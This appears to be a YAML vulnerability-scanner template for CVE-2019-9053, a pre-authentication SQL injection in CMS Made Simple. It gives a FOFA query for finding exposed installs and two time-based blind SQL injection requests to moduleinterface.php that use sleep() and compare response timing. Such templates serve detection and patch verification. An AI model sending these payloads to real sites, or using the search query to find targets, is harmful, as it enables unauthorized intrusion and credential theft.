product: CMS-Made-Simple
vName: CMS Made Simple (CMSMS) 前台SQL注入
type: SQL注入
vID:
  - CVE-2019-9053
level: 3
vDesc: 在 2.2.9.1 之前的版本中，CMS Made Simple 存在一个未验证的 SQL 注入漏洞，攻击者可利用该漏洞获取管理员密码或密码重置令牌。结合后台的SSTI 漏洞（CVE-2021-26120），攻击者可在目标服务器上执行任意代码。
version: ''
note: ''
search:
  FOFA: app="CMS-Made-Simple"
protocol: http
link: https://cloud.tencent.com/developer/article/1459195
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /moduleinterface.php?mact=News,m1_,default,0&m1_idlist=a,b,1,5))+and+(select+sleep(5))--+
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          time:
            check: '>='
            num: 5
  - exp:
      method: get
      follow: false
      path: /moduleinterface.php?mact=News,m1_,default,0&m1_idlist=a,b,1,5))+and+(select+sleep(0))--+
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          time:
            check: <=
            num: 3